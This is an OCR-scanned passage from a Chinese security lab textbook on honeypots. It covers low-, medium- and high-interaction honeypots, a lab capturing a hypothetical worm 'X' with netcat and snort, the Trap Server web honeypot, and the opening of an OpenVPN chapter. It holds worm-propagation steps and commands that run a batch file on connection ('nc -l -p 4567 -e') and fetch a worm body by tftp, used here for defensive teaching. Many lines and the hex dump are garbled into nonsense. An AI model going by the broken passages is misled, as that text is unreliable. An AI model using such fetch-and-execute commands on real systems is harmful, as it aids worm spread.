用 户 模式 服务 器 的 执行 取决 于 攻击 者 受骗 的 程度 。 如 果 适 当 配 置 , 攻 击 者 几乎 无 法 察 
觉 他 们 链接 的 是 用 户 模式 服务 器 而 不 是 真正 的 目标 主机 ,也 就 不 会 得 知 自己 的 行为 已 经 被 
记录 下 来 。 

用 户 模式 蜜 钠 的 优点 是 它 仅 仅 是 一 个 普通 的 用 户 进程 ,这 就 意味 着 攻击 者 如 果 想 控制 
机 器 ,就 必须 首先 冲破 用 户 模式 服务 器 ,再 找到 攻陷 主机 系统 的 有 效 方法 。 这 保证 了 系统 管 
理 员 可 以 在 面 对 强 大 对 手 的 同时 依然 保持 对 系统 的 控制 ,同时 也 为 取证 提供 证 据 。 因 为 每 
个 用 户 模 式 服 务 器 都 是 一 个 定位 在 主机 系统 上 的 单个 文件 ,如 果 要 清除 被 入 侵 者 攻陷 的 蜜 
饶 ,只 需 关 闭 主 机 上 的 用 户 模式 服务 器 进程 并 激活 一 个 新 的 进程 即 可 。 进 行 取证 时 ,只 需 将 
用 户 模 式 服务 器 文件 传递 到 另 一 台 计 算 机 ,激活 该 文件 .登录 并 调试 该 文件 系统 。 当 考虑 到 
XS SERE RATS RE IG E ,用户 模式 服务 器 的 另 一 个 优点 就 变 得 非常 明显 。 为 了 完全 地 记录 和 控制 
入 侵 蜜 钠 系 统 的 攻击 者 ,可 以 将 系统 配置 为 防火 墙 . 入 侵 检 测 系统 和 远程 登录 服务 器 。 但 是 
这 需要 多 个 服务 器 和 网 络 硬件 以 连接 所 有 的 组 成 部 分 。 如 果 使 用 用 户 模式 配置 ,所 有 的 组 
成 部 分 都 可 以 在 一 台 单独 的 主机 中 配置 完成 。 用 户 模 式 服务 器 最 大 的 缺点 是 不 适 于 所 有 的 
操作 系统 。 


14.3.4 SEIT Ay 38 


Ti s St E Sj vtto n [ap ETT BU Sz no] S MEET A) 2E. RT IG HE OP 3 类: 低 交 互 蜜 
SEE PS HE fe ACH EE 4C BRHÜEJETE BU £1 Or ORI E 20D HR fr ftd 
HgdEIRA IHE RENE. BRN RRA ST 3 个 过 程 , 分 别 是 低级 别 包含 .中 级别 包含 
和 高 级 别 包 含 。 


Suz BE 


1. REER 

5 tt FE fI 29 E HY RE CS EE R pe BR AY EBUR S o X E AR A EE EIk 
3 El ME TE SCHR. ERREA A SERE p eh OC SEL TE A PR FE R BET VA EE 
大 减少 了 危险 ,因为 操作 系统 的 复杂 性 降低 了 。 这 种 方式 的 一 个 缺点 是 不 可 能 观察 攻击 者 
和 操作 系统 之 间 的 交互 信息 。 低 级 别 包含 的 蜜 镀 就 像 单 向 的 连接 ,只 是 监听 但 不 会 发 送 响 
应 信息 ,这 种 方法 就 显得 很 被 动 。 

低 交 互 蜜 钠 最 大 的 特点 是 模拟 。 蜜 镀 为 攻击 者 展示 的 所 有 攻击 弱点 和 攻击 对 象 都 不 是 
真正 的 产品 系统 ,而 是 对 各 种 系统 及 其 提供 服务 的 模拟 。 由 于 所 有 的 服务 都 是 模拟 的 行为 ， 
所 以 蜜 缸 可 以 获得 的 信息 非常 有 限 , 只 能 对 攻击 行为 做 简单 的 记录 很 分 析 。 它 只 能 对 攻击 
者 进行 简单 的 应 答 ,不 能 够 像 真 正 的 系统 那样 与 攻击 者 进行 交互 。 但 是 , 低 交互 蜜 镀 是 3 种 
蜜 饶 中 最 为 安全 的 类 型 , 它 引 入 系统 的 风险 最 小 ,不 会 被 攻击 者 入 侵 并 作为 其 下 一 步 攻 击 的 
跳板 。 

2. Bx ER EE 

"Paz 8 Sk a Jer FOIE D HS E A BE DU GRUT 2 BALDI e x A TL CT Da P RR Br JH P RT 
VA3lETT A Rp BEE Jr BY E EE LS HER OK A — AS TE BU HIE RR E EE EXCEL rp as S E 
的 设计 目的 是 吸引 攻击 者 的 注意 力 ,从 而 起 到 保护 真正 系统 的 作用 。 它 们 是 看 起 来 比 真正 
系统 还 要 诱 人 的 攻击 日 标 ,而 攻击 者 一 旦 进入 蜜 钢 就 会 被 监视 并 跟踪 。 中 交互 蜜 钢 与 攻击 
者 之 间 的 交互 非常 接近 真正 的 交互 ,所 以 中 交互 蜜 色 从 攻击 者 的 行为 中 获得 更 多 的 信息 。 
虽然 中 交互 蜜 饶 是 对 真实 系统 的 模拟 ,但 是 它 已 经 是 一 个 健全 的 操作 系统 ,可 以 说 中 交互 蜜 
饶 是 一 个 经 过 修改 的 操作 系统 ,整个 系统 有 可 能 被 和 人 侵 ,所 以 系统 管理 员 需 要 对 蜜 缸 进行 定 
WAEA, T Se RE HE ARS o 

3. S3: B E ME 

AREE W RE HE ELE — SES RI HR E BE 1x FE Bl 2 L je t RE AY Pe e fe o TE 
随 之 增 大 ,但 同时 收集 信息 的 可 能 性 .吸引 攻击 者 攻击 的 程度 也 大 大 提高 。 黑 客 攻 入 系统 的 
目的 之 一 就 是 获取 root 权限 ,一 个 高 级 别 包 含 的 蜜 缸 就 提供 了 这 样 的 环境 。 一 旦 攻击 者 取 
得 权限 , 它 的 真实 活动 和 行为 都 被 记录 ,但 是 攻击 者 必须 要 攻 入 系统 才能 获得 这 种 自由 。 攻 
击 者 会 取得 root 权限 并 且 可 以 在 被 攻陷 的 机 器 上 做 任何 事情 ,这 样 系统 就 不 再 安全 ,整个 
机 器 也 不 再 安全 了 。 

这 类 蜜 铅 最 大 的 特点 是 真实 ,最 典型 的 例子 是 Honeynet。 高 交互 蜜 缸 是 完全 真实 的 系 
统 , 设 计 的 最 主要 目的 是 对 各 种 网 络 攻 击 行为 进行 研究 。 目 前 安全 组 织 最 缺乏 的 就 是 对 自 
己 的 敌人 一 一 攻击 者 的 了 解 , 最 需要 回答 的 问题 包括 谁 是 攻击 者 、 攻 击 者 如 何 进行 攻击 、 攻 
击 者 使 用 什么 工具 攻击 以 及 攻击 者 何 时 会 青 次 发 出 攻击 。 高 交互 蜜 钠 所 要 做 的 工作 就 是 对 
攻击 者 的 行为 进行 研究 以 回答 这 些 问题 。 显 然 ,高 交互 蜜 钠 最 大 的 缺点 是 被 入 侵 的 可 能 性 
很 高 。 使 用 高 等 级 包含 蜜 钠 非 常 需要 时 间 , 因 为 必须 要 长 期 监视 系统 ,如 果 蜜 钠 不 被 控制 ， 
那 对 其 自身 的 安全 也 很 不 利 。 限 制 蜜 钠 访 问 本 地 Internet 也 很 重要 ,因为 黑客 可 以 像 对 待 
一 般 被 攻陷 的 机 器 一 样 对 待 密 负 。 为 了 减少 系统 对 外 产生 的 危害 .必须 考虑 限制 蜜 负 外 出 
的 数据 包 。 通 过 向 攻击 者 提供 完整 的 操作 系统 ,攻击 者 可 以 上 传 和 安装 一 些 文件 ,这 就 是 高 
级 别 包 含 蜜 缸 的 一 个 优势 ,所 有 的 行为 都 能 被 记录 并 分 析 。 
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14.4 实验 内 容 


设计 一 个 蜜 把 能 够 捕获 蠕虫 病毒 ,并 模拟 蜜 钠 与 蠕虫 病毒 的 交互 ,了 解 常 用 的 虚拟 蜜 钠 
实现 方法 。 


14.5 实验 步骤 


本 实验 14. 5. 1 小 节 与 14. 5. 2 小 节 是 基于 中 软 吉 大 实验 系统 进行 ,如 果 没 有 部 署 该 套 
系统 ,可 以 直接 跳 至 14. 5. 3 小 节 练 习 使 用 常用 的 虚拟 蜜 缸 软件 进行 实验 。 本 练习 主机 A、 
B 为 一 组 ,实验 角色 说 明 如 表 14-1 所 示 。 


表 14-1 实验 角色 说 明 


实验 主机 实验 角色 
主机 A Sici EBL 
主机 也 蠕虫 主机 


14.5.1 提取 蠕虫 病毒 特征 并 升级 人 侵 检测 规则 库 


C1) 蜜 铅 主机 上 启动 Worm. srv, 开 放 带 有 漏洞 x 的 服务 。 

单 击 工具 栏 * 实 验 目录 ?按钮 ,进入 工作 目录 ,首先 使 用 命令 netstat -an 查看 处 于 监听 状 
态 的 TCP 端口 , 接 下 来 输入 Worm_srv. exe 启动 漏洞 服务 (启动 Worm. srv 的 目的 是 为 了 
查看 其 服务 端口 号 ) 。 

(2) 密 镀 主机 查看 漏洞 服务 端口 。 

再 次 查看 处 于 监听 状态 的 TCP. 端口 ,记录 漏洞 服务 的 端口 号 

(3) 蜜 饶 主 机 创建 端口 监听 器 。 

按 Ctrl+C 组 合 键 退 出 漏洞 服务 ,运行 netcat 创建 一 个 针对 漏洞 服务 端口 监听 器 ,并 将 
捕获 数据 重 定向 至 文件 worm. dat, 具 体操 作 命令 为 

(4) SERERE TERT da o 

进入 snort 工作 目录 ,启动 “snort”。 

说 明 : snort 工作 目录 中 包含 : bin 一 执行 目录 ;etc 一 配置 目录 ;lib 一 预 处 理 器 目录 ; 
rules 一 规则 集 目 录 。 

进入 执行 目录 ,输入 命令 snort -i 2 -v arp. HP 参数 用 于 指定 snort 监听 网 络 接口 ,-v 
用 于 显示 TCP/IP 包头 信息 。 

注 : 关于 snort 的 用 法 ,请 参看 第 13 章 实验 原理 。 

攻击 者 ( 同 组 主机 PO TE f iE SEE netcat 监听 器 和 snort 均 已 启动 的 情况 下 , 单 击 工具 
栏 “实验 目录 ?按钮 ,进入 工作 目录 ,输入 Worm body 启动 蠕虫 程序 。 

SE HEE DLL worm. dat 文件 , 当 其 大 小 发 生变 化 后 ,利用 UltraEdit 以 十 六 进 制 形式 
将 其 打开 ,并 完成 数据 特征 片段 的 提取 ,如 图 14. 1 所 示 。 


Sum Bum 


O0000000h: 68 AS 11 40 m 68 10 IE 12 bed a EA 24 10 00 00 ; 
O0000010h: 60 55 8B DO BO 32 88 : 
00000030h: 88 44 24 3D B5 5 BO 61 SS B2 ; 
00000040h: Bi 73 88 44 24 62 $6 44 24 68 56 BO 65 57 C? ; 
O00000050h: 84 24 EB O1 OO OO 44 OO OO OO 89 SC 24 EC O1 00 ; 
00000060h: O00 89 9C 24 FO 01 00 O0 89 9C 24 F4 01 00 00 89 ; 
00000070h: 9C 24 F8 01 OO 00 89 9C 24 FC 01 OO OO 89 9C 24 ; 
00000080h: 00 02 00 00 89 9C 24 04 02 OO 00 89 9C 24 OB 02 ; 
O0000090h: OO OO 89 9C 24 OC 02 00 OO 89 9C 24 10 02 00 00 : 


图 14.1 数据 特征 片段 的 提取 


(5) 蜜 饶 主机 就 病毒 特征 片段 编写 snort 入 侵 规 则 。 

oe HEE DL TALE Snort 按钮 ,进入 snort 规则 集 目 录 , 创 建 规则 文件 worm. rules, 
针对 病毒 特征 片段 编写 snort 人 侵 规则 ,并 设置 报警 日 志 。 进 入 配置 目录 ,配置 snort 文件 
snort. conf ,在 文档 最 后 添加 以 下 内 容 。 

include ..\rules\womn.rules 

(6) SENE FE DLA ELE WU 。 

See E EDLE EO Sg ICT Cl el RO M Ur s. SR Ji LACE UE 75 538 AT snort, 命 令 如 下 。 

snort -i2-v-c 配 置 目录 \snort.conf 

攻击 者 重新 运行 worm, body Kf; Ht. St GEILE snort 捕获 情况 ,并 查看 snort 报警 日 志 
(执行 目录 \log\alert. ids) 。 


14.5.2 利用 蜜 缸 与 网 络 蠕虫 进行 交互 


1. 蠕虫 X 感染 过 程 描述 
蠕虫 X 是 用 于 本 实验 的 假想 蠕虫 病毒 , 它 有 着 网 络 蠕虫 的 普遍 特征 ,蠕虫 X 感染 过 程 
如 图 14.2 所 示 。 


网 络 探测 


"o 
tFTP 服 务 器 


蠕虫 主要 蠕虫 主机 蠕虫 主机 
pr 网 络 行为 EDL 
tFTP(GET) 
请 求 下 载 病毒 体 


图 14.2 蠕虫 X 感 染 过 程 


CD 蠕虫 主机 上 蠕虫 X 首先 在 本 地 建立 tFTP 服务 器 ,开启 并 监听 69/UDP 端口 (支持 
GET、PUT fil QUIT 命令 ) ,用 来 当 作 感染 其 他 主机 的 服务 器 (病毒 体 通过 此 服务 被 下 载 ) 。 

(2) 蠕虫 主机 开辟 多 个 扫描 线程 ,以 本 地 TP. 地 址 为 基础 , 取 随 机 目标 IP 地 址 ,向 外 探 
ill 4567/TCP 端口 (4567/TCP 服务 是 带 有 漏洞 的 系统 服务 ) 。 

(3) 利用 被 探测 主机 的 4567 /TCP 中 存在 的 漏洞 ,一旦 攻击 成 功 则 会 导致 被 探测 主机 
感染 此 蠕虫。 

(4) EHLE ,溢出 代码 会 从 蠕虫 主机 下 载 至 本 地 ( 靶 机 ) ,而 溢出 代码 完成 的 功能 就 是 
主动 连接 蠕虫 主机 69/UDP 端口 (tFTP 服务 ) ,同时 将 自己 的 TP 地址 和 连接 的 客户 端口 号 
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传 过 去 ,最 后 通过 tFTP 将 蠕虫 病毒 体 从 蠕虫 主机 下 载 至 本 地 并 执行 。 靶 机 最 终 变 成 了 一 
台新 的 蠕虫 主机 ,开始 了 新 的 攻击 。 

2. 模拟 蠕虫 X 行为 

蠕虫 主机 所 要 模拟 的 蠕虫 行为 : 一 个 是 建立 本 地 tFTP 服务 ; 另 一 个 是 网 络 主机 探测 ， 
等 待 靶 机 请 求 下 载 病 毒 体 。 

针对 网 络 主机 探测 行为 ,通过 Telnet 指令 即 可 实现 。 例 如 ,蠕虫 扫描 主机 172. 16. 0. 150 的 
7000/TCP 端口 ,查看 该 主机 是 否 启用 了 漏洞 服务 ,Telnet 命令 如 下 : Telnet 172. 16. 0. 150 7000. 
车 返回 信息 “不 能 打开 到 主机 的 连接 ,在 端口 7000: 连 接 失败 ”, 表 明 该 服务 没有 被 启用 ( 防 
火 墙 因素 除外 )。 

针对 建立 本 地 tFTP 服务 行为 ,通过 C:\ExpNIS\NetAD-Lab\Tools\TFtpd\tftpd. exe 
(系统 自 带 tFTP 服务 器 程序 ) 即 可 实现 ,具体 操作 如 下 。 

CD 安装 tFTP ARS. 

进入 tFTPD 工作 目录 C:\ExpNIS\NetAD-Lab\Tools\TFtpd, 输 入 命令 如 下 。 


instsrv tftp C:\ExpNIS\NetAD- Lab\Tools\TFtpd\tftpd.exe 


车 安装 成 功 ,会 出 现 提示 信息 “The service was successfully added!”, 

(2) 启动 tFTP 服务 。 

继续 输入 命令 net start tftp。 若 服务 成 功 启动 ,会 出 现 提示 信息 “tFTP 服务 已 经 启动 
成 功 ”。 通 过 netstat -an 命令 查看 tFTP 服务 端口 69/UDP 是 否 已 启动 。 

(3) 创建 tFTPD 主 目录 。 

由 于 tFTP 服务 器 需要 指定 主 工作 目录 ,在 默认 状态 下 , tFTPD 主 目 录 为 c:\ 
tftpdroot ,创建 该 目录 ,并 将 蠕虫 体 文件 C:\ExpNIS\NetAD-Lab\Tools \ honeyworm\ Worm_ 
body. exe 备份 到 此 目录 中 ( 靶 机 “中 招 ” 后 ,会 主动 向 蠕虫 主机 tFTP 服务 请 求 下 载 worm | 
body. exe 文件 ) 。 

3. RERO SOL 

AERE IE ESA AE LAT « 一 个 是 创建 4567/TCP 端口 监听 器 ; 另 一 个 是 当 有 4567/TCP 
请 求 时 蜜 把 主动 访问 攻击 源 主机 (已 感染 蠕虫 X 主机 ) ,并 请 求 下 载 病毒 体 文件 worm_ 
body. exe。 

(1) 蜜 摊 请求 下 载 蠕虫 病毒 体 。 

为 方便 起 见 , 将 tFTP 客户 请 求 命令 保存 在 批 处 理 文件 getworm. bat 中 ,具体 操作 如 
下 。 在 目录 C:\ExpNIS\NetAD-Lab\Tools\Netcat 目录 下 新 建 批 处 理 文件 getworm. bat， 
右 击 该 文件 ,在 弹出 的 快捷 菜单 中 选择 “编辑 命令 ”, 添 加 新 行 ,内 容 如 下 。 

C:\ExpNIS\NetAD- Lap\Tools\TFtp Client\tftp -i 攻击 源 IP GET Worm body.exe D: Worm body.exe 

(2) SHEE PLONE 4567/TCP 监听 器 。 

SEE dE DLE; TALE nc 按钮 ,进入 Netcat 工作 目录 ,运行 Netcat 创建 一 个 针对 4567/ 
TCP 端口 的 监听 器 , 当 其 监听 到 4567/ TCP 请 求 时 会 触发 下 面 的 行为 : 通过 tFTP 命令 (目的 
服务 端口 69/UDP) 从 蠕虫 主机 下 载 病 毒 体 。 可 以 通过 下 面 的 命令 实现 netcat 程序 的 重 定向 : 

nc -1 -p 4567 - e getworm.bat 

其 中 ,-e 表示 程序 重 定向 , 当 监听 器 被 触发 后 , 它 会 执行 当前 目录 下 的 getworm. bat 批 
处 理 文 件 。 


Sum Bux 


4. BROS iH 
SE EE LS Ded EILER ERRE AL Telnet Bak SEE 4567/TCP 端 
口 ,在 确认 攻击 者 已 成 功 登 录 后 .SESESUE D 盘 根 目 录 是 否 已 捕获 蠕虫 病毒 体 文件 。 


14.5.3 ilb SERERE PESE BUR TU Sz h 


Trap Server 是 一 款 Web JRI d S£ ie EIF EA WA RU TR & A Il AY Hit k WM Apache 
HTTP Server, Microsoft IIS ^&, Trap Server % REZ £T IN HE FF JC — FHA Web 服务 
器 ,虚拟 服务 器 将 对 这 个 服务 器 的 访问 情况 进行 监视 ,并 把 所 有 对 该 服务 器 的 访问 记录 下 
来 ,包括 TP 地 址 .访问 文件 等 。 通 过 这 些 对 黑客 的 入侵 行为 进行 简单 的 分 析 。 

主机 A 安装 Trap Server 以 后 ,启动 Trap Server, 在 主 界面 的 “服务 器 类 别 ”" 下 拉 列 表 
HEPA 3 个 选项 。 分 别 是 “启动 IIS IRA” "A Apache 服务 器 ”和 “启动 EasyPHP 服务 
器 ” ,软件 可 以 模拟 上 述 3 种 服务 器 。 这 里 选择 “启动 TIS 服务 ”。Trap Server 模拟 的 TIS, 
Apache 和 EasyPHP 都 是 Web 服务 器 ,所 以 默认 监听 的 都 是 80 端口 。 主 页 路 径 默 认 的 是 
安装 Trap Server 目录 下 面 的 Web 文件 夹 ,可 以 自己 另外 设置 别 的 目录 。 软 件 默认 监听 的 
80 端口 ,也 可 以 修改 ,例如 系统 安装 了 IIS, 占 用 了 80 ,那么 完全 可 以 选择 一 个 没有 被 占用 的 
端口 ,如 7626 之 类 的 。 启 动 IIS 服务 如 图 14. 3 所 示 。 


[ts amen ea un [ems 
FM BL BSBA] WH 
| [n] [c] 
| Ft A eh = 
服务 器 设置 | amaa 
厅 记录 日 志 fw 自 动 保存 日 志 记录 Ot [  ——  — — 
监听 端口 [o 4 Lid [zo — — 
服务 器 类 别 5 Server BAD fe a 
主页 路 径 [C\Program Fies ERE BREE Webs. ux aum 
ee 一 一 | 
L al) 


图 14.3 选择 启动 IIS 服务 
在 主 界面 单 击 “开始 监听 ”按钮 ,开启 蜜 饶 服务 ,Trap Server 开始 侦 听 服务 器 的 80 端 

H. Trap Server 侦 听 服务 器 端口 如 图 14. 4 所 示 。 
[ts : anes a e) 


E^ £A GR RHO mms 
| m m 
开始 监听 “ 信 止 监听 
服务 器 设置 ERES 
厅 记录 日 志 M 自动 保存 日 志 记录 BexüP[| | 


COSE. COSAS. A Gave Lag 


监听 端口 [eo + 追踪 IP [zo | 
<22:11:10> Stop listening for IIS Server... 


服务 器 类 别 5 Server. BAG Bo s 
Hop # [IP 
图 14.4 Trap Server 侦 听 服务 器 端口 


EARE [C Progam Fies\ 庆 以 腿 务 器 软件 Web\s as ger 
在 主机 B 打 开 浏 览 器 ,输入 主机 A 的 IP, 即 模拟 攻击 者 通过 浏览 器 输入 服务 器 的 IP. 


<2015/5/24> 
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访问 用 Trap Server 模拟 的 Web 服务 。 这 时 ,在 Trap Server 主 界面 里 就 会 自动 监听 并 显 
示 攻 击 者 的 访问 操作 记录 ,如 图 14. 5 所 示 。 


tS: Bese: 
| 文件 SHE 运 项 RARS) 帮助 


|| m m 

|| 开始 监听 gka | 
|| ms BRAGA 
F 记录 日 志 M 自动 保存 日 志 记录 最 后 攻击 IP : [921681307 

amo: [o H 追踪 |P 127001 


服务 器 类 别 115 Server 最 大 值 : 3 sj 
主页 路 径 : [ce Fies\ 虚 拟 服 务 器 软件 \Web\is 
rogram Fil RPF Wel P5 VN 
User logged in ^ [Hop # [iP 


<2015/5/24> «22:20:44» Command GET / received from 192.168.1.107:60762 
Serving file C:\Program Files EID RAS 284% PE \Web \is\index. htm (4628 bytes / 4628 bytes sent] to 192.168.1,107:60762 
User logged out 
User logged in 
User logged in 
ren Ried «22:20:44» Command GET /backgmd gif received from 192.168. 1.107:60764 
ser logged in 
«2015/5/24» «22:20:44» Command GET /h. logo gif received from 192.168.1.107:60765 
<2015/5/24> «22:20:44» Command GET /SPACE. gif received from 192.168.1.107:60766 
Serving file C:\Program Files\ 虚 拟 服务 器 软件 \WebNis\backgmd gif (10282 bytes / 10282 bytes sent) to 192.168.1.107:60) 
User logged out 
Serving file C:\Program Files\ 虚 拟 服务 器 软件 \WebNis\SPACE gif (844 bytes / 844 bytes sent] to 192.168.1.107:60766 
ser logged out 
Serving file C:\Program Files\ 虚 拟 服务 器 软件 \WebNis\h_logo .gif (5081 bytes / 5081 bytes sent) to 192.168.1.107:60765 
User logged out 
User logged in 
«2015/5/24» «22:20:44» Command GET /docs.gif received from 192.168.1.107:60767 
Serving file C:\Program Files\ 虚 拟 服 务 器 软件 \Web\is\docs.gif (2893 bytes / 2893 bytes sent) to 192.168.1.107:60767 
User logged out 
User logged in 
<2015/5/24> «22:20:44» Command GET /tools.gif received from 192.168.1.107:60768 
Serving file C:\Program Files\ 庶 拟 服 务 器 软件 \Web\is\tools.gif (2513 bytes / 2513 bytes sent) to 192. 168.1.107:60768 
User logged out 
User logged in 
User logged in 
User logged out 
User logged out 
User logged in 
«2015/5/24» «22:20:44» Command GET /tools.gif received from 192.168.1.107:60777 
Serving file C:\Program Fies\ 虚 拟 服 务 器 软件 Web\is\tools. gif (2513 bytes / 2513 bytes sent) to 192.168.1.107:60777 


图 14.5 Trap Server 监听 攻击 者 访问 操作 记录 


14.6 思考 问题 
1. 与 同类 的 探测 软件 相 比 ,Trap Server 的 优势 和 劣势 有 哪些 ? 


2. 掌握 Trap Server 和 kfsensor 的 原理 。 
3. SERERE E SERE Neo n]? 其 特点 各 是 什么 ? 
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第 15 章 利用 OpenVPN 构建 企业 VPN 


15.1 实验 目的 与 要 求 


* 搭建 一 个 真实 的 企业 网 络 环境 。 
。 利用 OpenVPN 构建 企业 VPNs。 


15.2 实验 环境 


在 VMWare 虚拟 机 中 安装 操作 系统 Windows 2003 和 Linux, 在 企业 网 络 结构 下 ,每 组 
6 人 ,启动 TAP .OpenvpnClient。 


15.3 背景 知识 


15.3.1 VPN 简介 


VPN( Virtual Private Network, ,虚拟 专用 网 络 ) 被 定义 为 通过 一 个 公用 网 络 ( 通 常 是 因 
特 网 ) 建 立 一 个 临时 的 、 安 全 的 连接 ,是 一 条 穿 过 混乱 的 公用 网 络 的 安全 、 稳 定 隧 道 。 使 用 这 
条 隧道 可 以 对 数据 进行 几 倍加 密 达 到 安全 使 用 互联 网 的 目的 。 虚 拟 专用 网 是 对 企业 内 部 网 
的 扩展 。 虚 拟 专 用 网 可 以 帮助 远程 用 户 、 公 司 分 支 机 构 .商业 伙伴 及 供应 商 同 公司 的 内 部 网 
建立 可 信 的 安全 连接 ,用 于 经 济 、 有 效 地 连接 到 商业 伙伴 和 用 户 的 安全 外 联网 虚拟 专用 网 。 
VPN 主要 采用 隧道 技术 、 加 解密 技术 、 密 钥 管 理 技术 和 使 用 者 与 设备 身份 认证 技术 。 

VPN 有 3 种 方案 : 远程 访问 虚拟 网 (Access VPN) ,企业 内 部 虚拟 网 (Intranet VPN) 和 
企业 扩展 虚拟 网 (Extranet VPN) ,这 3 种 类 型 的 VPN 分 别 与 传统 的 远程 访问 网 络 、 企 业内 
部 的 Intranet 以 及 企业 网 和 相关 合作 伙伴 的 企业 网 所 构成 的 Extranet( 外 部 扩展 ) 相 对 应 。 


15.3.2 SSL VPN 简介 


SSL( 安 全 套 接 层 ) 协 议 是 一 种 在 Internet 上 保证 发 送信 息 安全 的 通用 协议 。 它 处 于 应 
用 层 。SSL 用 公 钥 加 密 通过 SSL 连接 传输 的 数据 来 工作 。SSL 协议 指定 了 在 应 用 程序 协 
议 ( 如 HTTP, Telnet 和 FTP 等 ) 和 TCP/IP 协议 之 间 进 行 数据 交换 的 安全 机 制 ,为 TCP/ 
IP 连接 提供 数据 加 密 、 服 务 器 认证 以 及 可 选 的 客户 机 认证 。SSL 协议 包括 握手 协议 .记录 
协议 及 警告 协议 三 部 分 : 握手 协议 负责 确定 用 于 客户 机 和 服务 器 之 间 的 会 话 加 密 参 数 ; 记 
录 协 议 用 于 交换 应 用 数据 ;警告 协议 用 于 在 发 生 错 误 时 终止 两 个 主机 之 间 的 会 话 。 

VPN 则 主要 应 用 于 虚拟 连接 网 络 , 它 可 以 确保 数据 的 机 密 性 ,并 且 具 有 一 定 的 访问 控 
制 功能 。VPN 是 一 项 非常 实用 的 技术 ., 它 可 以 扩展 企业 的 内 部 网 络 , 人 允许 企业 的 员工 、 客 户 
及 合作 伙伴 利用 Internet 访问 企业 网 ,而 成 本 远 远 低 于 传统 的 专线 接 入 。 过 去 ,VPN 总 是 
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和 IPSec 联系 在 一 起 ,因为 它 是 VPN 加 密 信息 实际 用 到 的 协议 。IPSec 运行 于 网 络 层 ， 
IPSec VPN 则 多 用 于 连接 两 个 网 络 或 点 到 点 之 间 的 连接 。 

SSL VPN 指 的 是 使 用 者 利用 浏览 器 内 建 的 Secure Socket Layer 封包 处 理 功能 ,用 浏 
览 器 连 回 公司 内 部 SSL VPN 服务 器 ,然后 透 过 网 络 封包 转向 的 方式 ,让 使 用 者 可 以 在 远程 
计算 机 执行 应 用 程序 , 读 取 公司 内 部 服务 器 数据 。 它 采用 标准 的 安全 套 接 层 (SSL) 对 传输 
中 的 数据 包 进 行 加 密 , 从 而 在 应 用 层 保护 了 数据 的 安全 性 。 高 质量 的 SSL VPN 解决 方案 
可 保证 企业 进行 安全 的 全 局 访问 。 在 不 断 扩展 的 互联 网 Web 站 点 之 间 以 及 远程 办 公 室 、 传 
统 交 易 大 厅 和 客户 端 间 ,SSL VPN 克服 了 IPSec VPN 的 不 足 , 用 户 可 以 轻松 实现 安全 易 
用 、 无 需 客户 端 安装 和 配置 简单 的 远程 访问 ,从 而 降低 用 户 的 总 成 本 并 增加 远程 用 户 的 工作 
效率 。 而 同样 在 这 些 地 方 , 设 置 传统 的 IPSec VPN 非常 困难 ,甚至 是 不 可 能 的 ,这 是 由 于 必 
须 更 改 网 络 地 址 转换 (NAT) 和 防火 墙 设置 。 

简单 来 讲 ,SSL VPN 一 般 的 实现 方式 是 在 企业 的 防火 墙 后 面 放置 一 个 SSL 代理 服务 
器 。 如 果 用 户 希 望 安全 地 连接 到 公司 网 络 上 ,那么 当 用 户 在 浏览 器 上 输入 一 个 URL 后 , 连 
接 将 被 SSL 代理 服务 器 取得 ,并 验证 该 用 户 的 身份 ,然后 SSL 代理 服务 器 将 提供 一 个 远程 
用 户 与 各 种 不 同 的 应 用 服务 器 之 间 连 接 。 掌 握 4 个 关键 术语 的 含义 有 助 于 理解 SSL VPN 
是 如 何 实现 的 , 即 代理 .应 用 转换 .端口 转发 和 网 络 扩展 。 

SSL VPN 网 关 至 少 要 实现 一 种 功能 : 代理 Web 页 面 。 它 将 来 自 远 端 浏览 器 的 页 面 请 
求 (采用 HTTPS 协议 ) 转 发 给 Web 服务 器 ,然后 将 服务 器 的 响应 回 传 给 终端 用 户 。 对 于 非 
Web 页 面 的 文件 访问 ,往往 要 借助 于 应 用 转换 。SSL VPN 网 关 与 企业 网 内 部 的 微软 CIFS 
或 FTP 服务 器 通信 ,将 这 些 服务 器 对 客户 端的 响应 转化 为 HTTPS 协议 和 HTML 格式 发 
往 客户 端 ,终端 用 户 感觉 这 些 服务 器 就 是 一 些 基 于 Web 的 应 用 。 

在 进行 代理 和 应 用 转换 时 ,测试 者 发 现 ,这 些 产品 之 间 存 在 着 很 大 的 差别 。 有 的 产品 所 
能 支持 的 应 用 转换 器 和 代理 的 数量 非常 少 。 有 的 则 很 好 地 支持 了 FTP、 网 络 文件 系统 和 微 
软文 件 服务 器 的 应 用 转换 。 用 户 在 选择 网 关 时 ,必须 对 自己 所 需要 转换 的 应 用 有 一 个 很 明 
确 的 了 解 ,并 能 够 根据 重要 性 给 它们 排 个 先后 顺序 。 

而 有 一 些 应 用 ,如 微软 Outlook 或 MSN, 它 们 的 外 观 会 在 转化 为 基于 Web 界面 的 过 程 
中 丢失 ,此 时 要 用 到 端口 转发 技术 。 端 口 转发 用 于 端口 定义 明确 的 应 用 。 它 需要 在 终端 系 
统 上 运行 一 个 非常 小 的 Java 或 ActiveX 程序 作为 端口 转发 器 ,监听 某 个 端口 上 的 连接 。 当 
数据 包 进 入 这 个 端口 时 ,它们 通过 SSL 连接 中 的 隧道 被 传送 到 SSL VPN 网 关 ,SSL VPN 
网 关 解 开封 装 的 数据 包 , 将 它们 转发 给 目的 应 用 服务 器 。 使 用 端口 转发 器 ,需要 终端 用 户 指 
向 他 希望 运行 的 本 地 应 用 程序 ,而 不 必 指 向 真正 的 应 用 服务 器 。 

一 些 SSL VPN 网 关 还 可 以 帮助 企业 实现 网 络 扩 展 。 它 将 终端 用 户 系统 连接 到 企业 网 
上 ,并 根据 网 络 层 信 息 ( 如 目的 IP 地 址 和 端口 号 ) 进 行 接 入 控制 。 虽然 牺 牲 了 高 级 别 的 安全 
性 , 却 也 换 来 了 复杂 拓扑 结构 下 网 络 管理 简单 的 好 处 。 


15.3.3 Open VPN 简介 


OpenVPN 是 一 个 具备 完全 特征 的 SSL VPN 解决 方案 ,是 一 个 用 户 空间 的 VPN, 能 够 
进行 大 范围 的 配置 操作 ,包括 远程 访问 、 站 点 站 点 间 VPN WiFi 安全 及 企业 级 远程 访问 解 
决 方案 ,支持 负载 均衡 ,错误 恢复 及 细 粒 度 的 访问 控制 。OpenVPN 的 主要 特征 包括 跨 平 台 
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的 可 移植 性 ,优秀 的 稳定 性 、 成 百 上 千 或 成 千 上 万 客户 端 支持 的 可 伸展 性 、 相 对 简单 的 安装 
过 程 支持 动态 IP 地 址 及 NAT. 

